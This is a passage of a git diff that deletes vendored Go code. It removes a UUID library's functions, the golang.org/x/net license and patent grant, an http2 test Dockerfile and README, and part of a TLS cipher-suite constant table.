FromString("6ba7b810-9dad-11d1-80b4-00c04fd430c8") - NamespaceURL, _ = FromString("6ba7b811-9dad-11d1-80b4-00c04fd430c8") - NamespaceOID, _ = FromString("6ba7b812-9dad-11d1-80b4-00c04fd430c8") - NamespaceX500, _ = FromString("6ba7b814-9dad-11d1-80b4-00c04fd430c8") -) - -// And returns result of binary AND of two UUIDs. -func And(u1 UUID, u2 UUID) UUID { - u := UUID{} - for i := 0; i < 16; i++ { - u[i] = u1[i] & u2[i] - } - return u -} - -// Or returns result of binary OR of two UUIDs. -func Or(u1 UUID, u2 UUID) UUID { - u := UUID{} - for i := 0; i < 16; i++ { - u[i] = u1[i] | u2[i] - } - return u -} - -// Equal returns true if u1 and u2 equals, otherwise returns false. -func Equal(u1 UUID, u2 UUID) bool { - return bytes.Equal(u1[:], u2[:]) -} - -// Version returns algorithm version used to generate UUID. -func (u UUID) Version() uint { - return uint(u[6] >> 4) -} - -// Variant returns UUID layout variant. -func (u UUID) Variant() uint { - switch { - case (u[8] & 0x80) == 0x00: - return VariantNCS - case (u[8]&0xc0)|0x80 == 0x80: - return VariantRFC4122 - case (u[8]&0xe0)|0xc0 == 0xc0: - return VariantMicrosoft - } - return VariantFuture -} - -// Bytes returns bytes slice representation of UUID. -func (u UUID) Bytes() []byte { - return u[:] -} - -// Returns canonical string representation of UUID: -// xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx. -func (u UUID) String() string { - buf := make([]byte, 36) - - hex.Encode(buf[0:8], u[0:4]) - buf[8] = dash - hex.Encode(buf[9:13], u[4:6]) - buf[13] = dash - hex.Encode(buf[14:18], u[6:8]) - buf[18] = dash - hex.Encode(buf[19:23], u[8:10]) - buf[23] = dash - hex.Encode(buf[24:], u[10:]) - - return string(buf) -} - -// SetVersion sets version bits. 
-func (u *UUID) SetVersion(v byte) { - u[6] = (u[6] & 0x0f) | (v << 4) -} - -// SetVariant sets variant bits as described in RFC 4122. -func (u *UUID) SetVariant() { - u[8] = (u[8] & 0xbf) | 0x80 -} - -// MarshalText implements the encoding.TextMarshaler interface. -// The encoding is the same as returned by String. -func (u UUID) MarshalText() (text []byte, err error) { - text = []byte(u.String()) - return -} - -// UnmarshalText implements the encoding.TextUnmarshaler interface. -// Following formats are supported: -// "6ba7b810-9dad-11d1-80b4-00c04fd430c8", -// "{6ba7b810-9dad-11d1-80b4-00c04fd430c8}", -// "urn:uuid:6ba7b810-9dad-11d1-80b4-00c04fd430c8" -func (u *UUID) UnmarshalText(text []byte) (err error) { - if len(text) < 32 { - err = fmt.Errorf("uuid: UUID string too short: %s", text) - return - } - - t := text[:] - braced := false - - if bytes.Equal(t[:9], urnPrefix) { - t = t[9:] - } else if t[0] == '{' { - braced = true - t = t[1:] - } - - b := u[:] - - for i, byteGroup := range byteGroups { - if i > 0 { - if t[0] != '-' { - err = fmt.Errorf("uuid: invalid string format") - return - } - t = t[1:] - } - - if len(t) < byteGroup { - err = fmt.Errorf("uuid: UUID string too short: %s", text) - return - } - - if i == 4 && len(t) > byteGroup && - ((braced && t[byteGroup] != '}') || len(t[byteGroup:]) > 1 || !braced) { - err = fmt.Errorf("uuid: UUID string too long: %s", text) - return - } - - _, err = hex.Decode(b[:byteGroup/2], t[:byteGroup]) - if err != nil { - return - } - - t = t[byteGroup:] - b = b[byteGroup/2:] - } - - return -} - -// MarshalBinary implements the encoding.BinaryMarshaler interface. -func (u UUID) MarshalBinary() (data []byte, err error) { - data = u.Bytes() - return -} - -// UnmarshalBinary implements the encoding.BinaryUnmarshaler interface. -// It will return error if the slice isn't 16 bytes long. -func (u *UUID) UnmarshalBinary(data []byte) (err error) { - if len(data) != 16 { - err = fmt.Errorf("uuid: UUID must be exactly 16 bytes long, got %d bytes", len(data)) - return - } - copy(u[:], data) - - return -} - -// Value implements the driver.Valuer interface. -func (u UUID) Value() (driver.Value, error) { - return u.String(), nil -} - -// Scan implements the sql.Scanner interface. -// A 16-byte slice is handled by UnmarshalBinary, while -// a longer byte slice or a string is handled by UnmarshalText. -func (u *UUID) Scan(src interface{}) error { - switch src := src.(type) { - case []byte: - if len(src) == 16 { - return u.UnmarshalBinary(src) - } - return u.UnmarshalText(src) - - case string: - return u.UnmarshalText([]byte(src)) - } - - return fmt.Errorf("uuid: cannot convert %T to UUID", src) -} - -// Value implements the driver.Valuer interface. -func (u NullUUID) Value() (driver.Value, error) { - if !u.Valid { - return nil, nil - } - // Delegate to UUID Value function - return u.UUID.Value() -} - -// Scan implements the sql.Scanner interface. -func (u *NullUUID) Scan(src interface{}) error { - if src == nil { - u.UUID, u.Valid = Nil, false - return nil - } - - // Delegate to UUID Scan function - u.Valid = true - return u.UUID.Scan(src) -} - -// FromBytes returns UUID converted from raw byte slice input. -// It will return error if the slice isn't 16 bytes long. -func FromBytes(input []byte) (u UUID, err error) { - err = u.UnmarshalBinary(input) - return -} - -// FromBytesOrNil returns UUID converted from raw byte slice input. -// Same behavior as FromBytes, but returns a Nil UUID on error. 
-func FromBytesOrNil(input []byte) UUID { - uuid, err := FromBytes(input) - if err != nil { - return Nil - } - return uuid -} - -// FromString returns UUID parsed from string input. -// Input is expected in a form accepted by UnmarshalText. -func FromString(input string) (u UUID, err error) { - err = u.UnmarshalText([]byte(input)) - return -} - -// FromStringOrNil returns UUID parsed from string input. -// Same behavior as FromString, but returns a Nil UUID on error. -func FromStringOrNil(input string) UUID { - uuid, err := FromString(input) - if err != nil { - return Nil - } - return uuid -} - -// Returns UUID v1/v2 storage state. -// Returns epoch timestamp, clock sequence, and hardware address. -func getStorage() (uint64, uint16, []byte) { - storageOnce.Do(initStorage) - - storageMutex.Lock() - defer storageMutex.Unlock() - - timeNow := epochFunc() - // Clock changed backwards since last UUID generation. - // Should increase clock sequence. - if timeNow <= lastTime { - clockSequence++ - } - lastTime = timeNow - - return timeNow, clockSequence, hardwareAddr[:] -} - -// NewV1 returns UUID based on current timestamp and MAC address. -func NewV1() UUID { - u := UUID{} - - timeNow, clockSeq, hardwareAddr := getStorage() - - binary.BigEndian.PutUint32(u[0:], uint32(timeNow)) - binary.BigEndian.PutUint16(u[4:], uint16(timeNow>>32)) - binary.BigEndian.PutUint16(u[6:], uint16(timeNow>>48)) - binary.BigEndian.PutUint16(u[8:], clockSeq) - - copy(u[10:], hardwareAddr) - - u.SetVersion(1) - u.SetVariant() - - return u -} - -// NewV2 returns DCE Security UUID based on POSIX UID/GID. -func NewV2(domain byte) UUID { - u := UUID{} - - timeNow, clockSeq, hardwareAddr := getStorage() - - switch domain { - case DomainPerson: - binary.BigEndian.PutUint32(u[0:], posixUID) - case DomainGroup: - binary.BigEndian.PutUint32(u[0:], posixGID) - } - - binary.BigEndian.PutUint16(u[4:], uint16(timeNow>>32)) - binary.BigEndian.PutUint16(u[6:], uint16(timeNow>>48)) - binary.BigEndian.PutUint16(u[8:], clockSeq) - u[9] = domain - - copy(u[10:], hardwareAddr) - - u.SetVersion(2) - u.SetVariant() - - return u -} - -// NewV3 returns UUID based on MD5 hash of namespace UUID and name. -func NewV3(ns UUID, name string) UUID { - u := newFromHash(md5.New(), ns, name) - u.SetVersion(3) - u.SetVariant() - - return u -} - -// NewV4 returns random generated UUID. -func NewV4() UUID { - u := UUID{} - safeRandom(u[:]) - u.SetVersion(4) - u.SetVariant() - - return u -} - -// NewV5 returns UUID based on SHA-1 hash of namespace UUID and name. -func NewV5(ns UUID, name string) UUID { - u := newFromHash(sha1.New(), ns, name) - u.SetVersion(5) - u.SetVariant() - - return u -} - -// Returns UUID based on hashing of namespace UUID and name. -func newFromHash(h hash.Hash, ns UUID, name string) UUID { - u := UUID{} - h.Write(ns[:]) - h.Write([]byte(name)) - copy(u[:], h.Sum(nil)) - - return u -} diff --git a/vendor/golang.org/x/net/LICENSE b/vendor/golang.org/x/net/LICENSE deleted file mode 100644 index 6a66aea5..00000000 --- a/vendor/golang.org/x/net/LICENSE +++ /dev/null @@ -1,27 +0,0 @@ -Copyright (c) 2009 The Go Authors. All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are -met: - - * Redistributions of source code must retain the above copyright -notice, this list of conditions and the following disclaimer. 
- * Redistributions in binary form must reproduce the above -copyright notice, this list of conditions and the following disclaimer -in the documentation and/or other materials provided with the -distribution. - * Neither the name of Google Inc. nor the names of its -contributors may be used to endorse or promote products derived from -this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT -LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, -DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/vendor/golang.org/x/net/PATENTS b/vendor/golang.org/x/net/PATENTS deleted file mode 100644 index 73309904..00000000 --- a/vendor/golang.org/x/net/PATENTS +++ /dev/null @@ -1,22 +0,0 @@ -Additional IP Rights Grant (Patents) - -"This implementation" means the copyrightable works distributed by -Google as part of the Go project. - -Google hereby grants to You a perpetual, worldwide, non-exclusive, -no-charge, royalty-free, irrevocable (except as stated in this section) -patent license to make, have made, use, offer to sell, sell, import, -transfer and otherwise run, modify and propagate the contents of this -implementation of Go, where such license applies only to those patent -claims, both currently owned or controlled by Google and acquired in -the future, licensable by Google that are necessarily infringed by this -implementation of Go. This grant does not include claims that would be -infringed only as a consequence of further modification of this -implementation. If you or your agent or exclusive licensee institute or -order or agree to the institution of patent litigation against any -entity (including a cross-claim or counterclaim in a lawsuit) alleging -that this implementation of Go or any code incorporated within this -implementation of Go constitutes direct or contributory patent -infringement, or inducement of patent infringement, then any patent -rights granted to you under this License for this implementation of Go -shall terminate as of the date such litigation is filed. diff --git a/vendor/golang.org/x/net/http2/Dockerfile b/vendor/golang.org/x/net/http2/Dockerfile deleted file mode 100644 index 53fc5257..00000000 --- a/vendor/golang.org/x/net/http2/Dockerfile +++ /dev/null @@ -1,51 +0,0 @@ -# -# This Dockerfile builds a recent curl with HTTP/2 client support, using -# a recent nghttp2 build. -# -# See the Makefile for how to tag it. If Docker and that image is found, the -# Go tests use this curl binary for integration tests. 
-# - -FROM ubuntu:trusty - -RUN apt-get update && \ - apt-get upgrade -y && \ - apt-get install -y git-core build-essential wget - -RUN apt-get install -y --no-install-recommends \ - autotools-dev libtool pkg-config zlib1g-dev \ - libcunit1-dev libssl-dev libxml2-dev libevent-dev \ - automake autoconf - -# The list of packages nghttp2 recommends for h2load: -RUN apt-get install -y --no-install-recommends make binutils \ - autoconf automake autotools-dev \ - libtool pkg-config zlib1g-dev libcunit1-dev libssl-dev libxml2-dev \ - libev-dev libevent-dev libjansson-dev libjemalloc-dev \ - cython python3.4-dev python-setuptools - -# Note: setting NGHTTP2_VER before the git clone, so an old git clone isn't cached: -ENV NGHTTP2_VER 895da9a -RUN cd /root && git clone https://github.com/tatsuhiro-t/nghttp2.git - -WORKDIR /root/nghttp2 -RUN git reset --hard $NGHTTP2_VER -RUN autoreconf -i -RUN automake -RUN autoconf -RUN ./configure -RUN make -RUN make install - -WORKDIR /root -RUN wget http://curl.haxx.se/download/curl-7.45.0.tar.gz -RUN tar -zxvf curl-7.45.0.tar.gz -WORKDIR /root/curl-7.45.0 -RUN ./configure --with-ssl --with-nghttp2=/usr/local -RUN make -RUN make install -RUN ldconfig - -CMD ["-h"] -ENTRYPOINT ["/usr/local/bin/curl"] - diff --git a/vendor/golang.org/x/net/http2/Makefile b/vendor/golang.org/x/net/http2/Makefile deleted file mode 100644 index 55fd826f..00000000 --- a/vendor/golang.org/x/net/http2/Makefile +++ /dev/null @@ -1,3 +0,0 @@ -curlimage: - docker build -t gohttp2/curl . - diff --git a/vendor/golang.org/x/net/http2/README b/vendor/golang.org/x/net/http2/README deleted file mode 100644 index 360d5aa3..00000000 --- a/vendor/golang.org/x/net/http2/README +++ /dev/null @@ -1,20 +0,0 @@ -This is a work-in-progress HTTP/2 implementation for Go. - -It will eventually live in the Go standard library and won't require -any changes to your code to use. It will just be automatic. - -Status: - -* The server support is pretty good. A few things are missing - but are being worked on. -* The client work has just started but shares a lot of code - is coming along much quicker. - -Docs are at https://godoc.org/golang.org/x/net/http2 - -Demo test server at https://http2.golang.org/ - -Help & bug reports welcome! - -Contributing: https://golang.org/doc/contribute.html -Bugs: https://golang.org/issue/new?title=x/net/http2:+ diff --git a/vendor/golang.org/x/net/http2/ciphers.go b/vendor/golang.org/x/net/http2/ciphers.go deleted file mode 100644 index 698860b7..00000000 --- a/vendor/golang.org/x/net/http2/ciphers.go +++ /dev/null @@ -1,641 +0,0 @@ -// Copyright 2017 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -// A list of the possible cipher suite ids. 
Taken from -// http://www.iana.org/assignments/tls-parameters/tls-parameters.txt - -const ( - cipher_TLS_NULL_WITH_NULL_NULL uint16 = 0x0000 - cipher_TLS_RSA_WITH_NULL_MD5 uint16 = 0x0001 - cipher_TLS_RSA_WITH_NULL_SHA uint16 = 0x0002 - cipher_TLS_RSA_EXPORT_WITH_RC4_40_MD5 uint16 = 0x0003 - cipher_TLS_RSA_WITH_RC4_128_MD5 uint16 = 0x0004 - cipher_TLS_RSA_WITH_RC4_128_SHA uint16 = 0x0005 - cipher_TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 uint16 = 0x0006 - cipher_TLS_RSA_WITH_IDEA_CBC_SHA uint16 = 0x0007 - cipher_TLS_RSA_EXPORT_WITH_DES40_CBC_SHA uint16 = 0x0008 - cipher_TLS_RSA_WITH_DES_CBC_SHA uint16 = 0x0009 - cipher_TLS_RSA_WITH_3DES_EDE_CBC_SHA uint16 = 0x000A - cipher_TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA uint16 = 0x000B - cipher_TLS_DH_DSS_WITH_DES_CBC_SHA uint16 = 0x000C - cipher_TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA uint16 = 0x000D - cipher_TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA uint16 = 0x000E - cipher_TLS_DH_RSA_WITH_DES_CBC_SHA uint16 = 0x000F - cipher_TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA uint16 = 0x0010 - cipher_TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA uint16 = 0x0011 - cipher_TLS_DHE_DSS_WITH_DES_CBC_SHA uint16 = 0x0012 - cipher_TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA uint16 = 0x0013 - cipher_TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA uint16 = 0x0014 - cipher_TLS_DHE_RSA_WITH_DES_CBC_SHA uint16 = 0x0015 - cipher_TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA uint16 = 0x0016 - cipher_TLS_DH_anon_EXPORT_WITH_RC4_40_MD5 uint16 = 0x0017 - cipher_TLS_DH_anon_WITH_RC4_128_MD5 uint16 = 0x0018 - cipher_TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA uint16 = 0x0019 - cipher_TLS_DH_anon_WITH_DES_CBC_SHA uint16 = 0x001A - cipher_TLS_DH_anon_WITH_3DES_EDE_CBC_SHA uint16 = 0x001B - // Reserved uint16 = 0x001C-1D - cipher_TLS_KRB5_WITH_DES_CBC_SHA uint16 = 0x001E - cipher_TLS_KRB5_WITH_3DES_EDE_CBC_SHA uint16 = 0x001F - cipher_TLS_KRB5_WITH_RC4_128_SHA uint16 = 0x0020 - cipher_TLS_KRB5_WITH_IDEA_CBC_SHA uint16 = 0x0021 - cipher_TLS_KRB5_WITH_DES_CBC_MD5 uint16 = 0x0022 - cipher_TLS_KRB5_WITH_3DES_EDE_CBC_MD5 uint16 = 0x0023 - cipher_TLS_KRB5_WITH_RC4_128_MD5 uint16 = 0x0024 - cipher_TLS_KRB5_WITH_IDEA_CBC_MD5 uint16 = 0x0025 - cipher_TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA uint16 = 0x0026 - cipher_TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA uint16 = 0x0027 - cipher_TLS_KRB5_EXPORT_WITH_RC4_40_SHA uint16 = 0x0028 - cipher_TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5 uint16 = 0x0029 - cipher_TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5 uint16 = 0x002A - cipher_TLS_KRB5_EXPORT_WITH_RC4_40_MD5 uint16 = 0x002B - cipher_TLS_PSK_WITH_NULL_SHA uint16 = 0x002C - cipher_TLS_DHE_PSK_WITH_NULL_SHA uint16 = 0x002D - cipher_TLS_RSA_PSK_WITH_NULL_SHA uint16 = 0x002E - cipher_TLS_RSA_WITH_AES_128_CBC_SHA uint16 = 0x002F - cipher_TLS_DH_DSS_WITH_AES_128_CBC_SHA uint16 = 0x0030 - cipher_TLS_DH_RSA_WITH_AES_128_CBC_SHA uint16 = 0x0031 - cipher_TLS_DHE_DSS_WITH_AES_128_CBC_SHA uint16 = 0x0032 - cipher_TLS_DHE_RSA_WITH_AES_128_CBC_SHA uint16 = 0x0033 - cipher_TLS_DH_anon_WITH_AES_128_CBC_SHA uint16 = 0x0034 - cipher_TLS_RSA_WITH_AES_256_CBC_SHA uint16 = 0x0035 - cipher_TLS_DH_DSS_WITH_AES_256_CBC_SHA uint16 = 0x0036 - cipher_TLS_DH_RSA_WITH_AES_256_CBC_SHA uint16 = 0x0037 - cipher_TLS_DHE_DSS_WITH_AES_256_CBC_SHA uint16 = 0x0038 - cipher_TLS_DHE_RSA_WITH_AES_256_CBC_SHA uint16 = 0x0039 - cipher_TLS_DH_anon_WITH_AES_256_CBC_SHA uint16 = 0x003A - cipher_TLS_RSA_WITH_NULL_SHA256 uint16 = 0x003B - cipher_TLS_RSA_WITH_AES_128_CBC_SHA256 uint16 = 0x003C - cipher_TLS_RSA_WITH_AES_256_CBC_SHA256 uint16 = 0x003D - cipher_TLS_DH_DSS_WITH_AES_128_CBC_SHA256 uint16 = 0x003E - 
cipher_TLS_DH_RSA_WITH_AES_128_CBC_SHA256 uint16 = 0x003F - cipher_TLS_DHE_DSS_WITH_AES_128_CBC_SHA256 uint16 = 0x0040 - cipher_TLS_RSA_WITH_CAMELLIA_128_CBC_SHA uint16 = 0x0041 - cipher_TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA uint16 = 0x0042 - cipher_TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA uint16 = 0x0043 - cipher_TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA uint16 = 0x0044 - cipher_TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA uint16 = 0x0045 - cipher_TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA uint16 = 0x0046 - // Reserved uint16 = 0x0047-4F - // Reserved uint16 = 0x0050-58 - // Reserved uint16 = 0x0059-5C - // Unassigned uint16 = 0x005D-5F - // Reserved uint16 = 0x0060-66 - cipher_TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 uint16 = 0x0067 - cipher_TLS_DH_DSS_WITH_AES_256_CBC_SHA256 uint16 = 0x0068 - cipher_TLS_DH_RSA_WITH_AES_256_CBC_SHA256 uint16 = 0x0069 - cipher_TLS_DHE_DSS_WITH_AES_256_CBC_SHA256 uint16 = 0x006A - cipher_TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 uint16 = 0x006B - cipher_TLS_DH_anon_WITH_AES_128_CBC_SHA256 uint16 = 0x006C - cipher_TLS_DH_anon_WITH_AES_256_CBC_SHA256 uint16 = 0x006D - // Unassigned uint16 = 0x006E-83 - cipher_TLS_RSA_WITH_CAMELLIA_256_CBC_SHA uint16 = 0x0084 - cipher_TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA uint16 = 0x0085 - cipher_TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA uint16 = 0x0086 - cipher_TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA uint16 = 0x0087 - cipher_TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA uint16 = 0x0088 - cipher_TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA uint16 = 0x0089 - cipher_TLS_PSK_WITH_RC4_128_SHA uint16 = 0x008A - cipher_TLS_PSK_WITH_3DES_EDE_CBC_SHA uint16 = 0x008B - cipher_TLS_PSK_WITH_AES_128_CBC_SHA uint16 = 0x008C - cipher_TLS_PSK_WITH_AES_256_CBC_SHA uint16 = 0x008D - cipher_TLS_DHE_PSK_WITH_RC4_128_SHA uint16 = 0x008E - cipher_TLS_DHE_PSK_WITH_3DES_EDE_CBC_SHA uint16 = 0x008F - cipher_TLS_DHE_PSK_WITH_AES_128_CBC_SHA uint16 = 0x0090 - cipher_TLS_DHE_PSK_WITH_AES_256_CBC_SHA uint16 = 0x0091 - cipher_TLS_RSA_PSK_WITH_RC4_128_SHA uint16 = 0x0092 - cipher_TLS_RSA_PSK_WITH_3DES_EDE_CBC_SHA uint16 = 0x0093 - cipher_TLS_RSA_PSK_WITH_AES_128_CBC_SHA uint16 = 0x0094 - cipher_TLS_RSA_PSK_WITH_AES_256_CBC_SHA uint16 = 0x0095 - cipher_TLS_RSA_WITH_SEED_CBC_SHA uint16 = 0x0096 - cipher_TLS_DH_DSS_WITH_SEED_CBC_SHA uint16 = 0x0097 - cipher_TLS_DH_RSA_WITH_SEED_CBC_SHA uint16 = 0x0098 - cipher_TLS_DHE_DSS_WITH_SEED_CBC_SHA uint16 = 0x0099 - cipher_TLS_DHE_RSA_WITH_SEED_CBC_SHA uint16 = 0x009A - cipher_TLS_DH_anon_WITH_SEED_CBC_SHA uint16 = 0x009B - cipher_TLS_RSA_WITH_AES_128_GCM_SHA256 uint16 = 0x009C - cipher_TLS_RSA_WITH_AES_256_GCM_SHA384 uint16 = 0x009D - cipher_TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 uint16 = 0x009E - cipher_TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 uint16 = 0x009F - cipher_TLS_DH_RSA_WITH_AES_128_GCM_SHA256 uint16 = 0x00A0 - cipher_TLS_DH_RSA_WITH_AES_256_GCM_SHA384 uint16 = 0x00A1 - cipher_TLS_DHE_DSS_WITH_AES_128_GCM_SHA256 uint16 = 0x00A2 - cipher_TLS_DHE_DSS_WITH_AES_256_GCM_SHA384 uint16 = 0x00A3 - cipher_TLS_DH_DSS_WITH_AES_128_GCM_SHA256 uint16 = 0x00A4 - cipher_TLS_DH_DSS_WITH_AES_256_GCM_SHA384 uint16 = 0x00A5 - cipher_TLS_DH_anon_WITH_AES_128_GCM_SHA256 uint16 = 0x00A6 - cipher_TLS_DH_anon_WITH_AES_256_GCM_SHA384 uint16 = 0x00A7 - cipher_TLS_PSK_WITH_AES_128_GCM_SHA256 uint16 = 0x00A8 - cipher_TLS_PSK_WITH_AES_256_GCM_SHA384 uint16 = 0x00A9 - cipher_TLS_DHE_PSK_WITH_AES_128_GCM_SHA256 uint16 = 0x00AA - cipher_TLS_DHE_PSK_WITH_AES_256_GCM_SHA384 uint16 = 0x00AB - cipher_TLS_RSA_PSK_WITH_AES_128_GCM_SHA256 uint16 = 0x00AC - cipher_TLS_RSA_PSK_WITH_AES_256_GCM_SHA384 uint16 
= 0x00AD - cipher_TLS_PSK_WITH_AES_128_CBC_SHA256 uint16 = 0x00AE - cipher_TLS_PSK_WITH_AES_256_CBC_SHA384 uint16 = 0x00AF - cipher_TLS_PSK_WITH_NULL_SHA256 uint16 = 0x00B0 - cipher_TLS_PSK_WITH_NULL_SHA384 uint16 = 0x00B1 - cipher_TLS_DHE_PSK_WITH_AES_128_CBC_SHA256 uint16 = 0x00B2 - cipher_TLS_DHE_PSK_WITH_AES_256_CBC_SHA384 uint16 = 0x00B3 - cipher_TLS_DHE_PSK_WITH_NULL_SHA256 uint16 = 0x00B4 - cipher_TLS_DHE_PSK_WITH_NULL_SHA384 uint16 = 0x00B5 - cipher_TLS_RSA_PSK_WITH_AES_128_CBC_SHA256 uint16 = 0x00B6 - cipher_TLS_RSA_PSK_WITH_AES_256_CBC_SHA384 uint16 = 0x00B7 - cipher_TLS_RSA_PSK_WITH_NULL_SHA256 uint16 = 0x00B8 - cipher_TLS_RSA_PSK_WITH_NULL_SHA384 uint16 = 0x00B9 - cipher_TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0x00BA - cipher_TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0x00BB - cipher_TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0x00BC - cipher_TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0x00BD - cipher_TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0x00BE - cipher_TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0x00BF - cipher_TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256 uint16 = 0x00C0 - cipher_TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256 uint16 = 0x00C1 - cipher_TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256 uint16 = 0x00C2 - cipher_TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256 uint16 = 0x00C3 - cipher_TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256 uint16 = 0x00C4 - cipher_TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256 uint16 = 0x00C5 - // Unassigned uint16 = 0x00C6-FE - cipher_TLS_EMPTY_RENEGOTIATION_INFO_SCSV uint16 = 0x00FF - // Unassigned uint16 = 0x01-55,* - cipher_TLS_FALLBACK_SCSV uint16 = 0x5600 - // Unassigned uint16 = 0x5601 - 0xC000 - cipher_TLS_ECDH_ECDSA_WITH_NULL_SHA uint16 = 0xC001 - cipher_TLS_ECDH_ECDSA_WITH_RC4_128_SHA uint16 = 0xC002 - cipher_TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA uint16 = 0xC003 - cipher_TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA uint16 = 0xC004 - cipher_TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA uint16 = 0xC005 - cipher_TLS_ECDHE_ECDSA_WITH_NULL_SHA uint16 = 0xC006 - cipher_TLS_ECDHE_ECDSA_WITH_RC4_128_SHA uint16 = 0xC007 - cipher_TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA uint16 = 0xC008 - cipher_TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA uint16 = 0xC009 - cipher_TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA uint16 = 0xC00A - cipher_TLS_ECDH_RSA_WITH_NULL_SHA uint16 = 0xC00B - cipher_TLS_ECDH_RSA_WITH_RC4_128_SHA uint16 = 0xC00C - cipher_TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA uint16 = 0xC00D - cipher_TLS_ECDH_RSA_WITH_AES_128_CBC_SHA uint16 = 0xC00E - cipher_TLS_ECDH_RSA_WITH_AES_256_CBC_SHA uint16 = 0xC00F - cipher_TLS_ECDHE_RSA_WITH_NULL_SHA uint16 = 0xC010 - cipher_TLS_ECDHE_RSA_WITH_RC4_128_SHA uint16 = 0xC011 - cipher_TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA uint16 = 0xC012 - cipher_TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA uint16 = 0xC013 - cipher_TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA uint16 = 0xC014 - cipher_TLS_ECDH_anon_WITH_NULL_SHA uint16 = 0xC015 - cipher_TLS_ECDH_anon_WITH_RC4_128_SHA uint16 = 0xC016 - cipher_TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA uint16 = 0xC017 - cipher_TLS_ECDH_anon_WITH_AES_128_CBC_SHA uint16 = 0xC018 - cipher_TLS_ECDH_anon_WITH_AES_256_CBC_SHA uint16 = 0xC019 - cipher_TLS_SRP_SHA_WITH_3DES_EDE_CBC_SHA uint16 = 0xC01A - cipher_TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA uint16 = 0xC01B - cipher_TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA uint16 = 0xC01C - cipher_TLS_SRP_SHA_WITH_AES_128_CBC_SHA uint16 = 0xC01D - cipher_TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA uint16 = 0xC01E - cipher_TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA uint16 = 0xC01F - cipher_TLS_SRP_SHA_WITH_AES_256_CBC_SHA uint16 = 
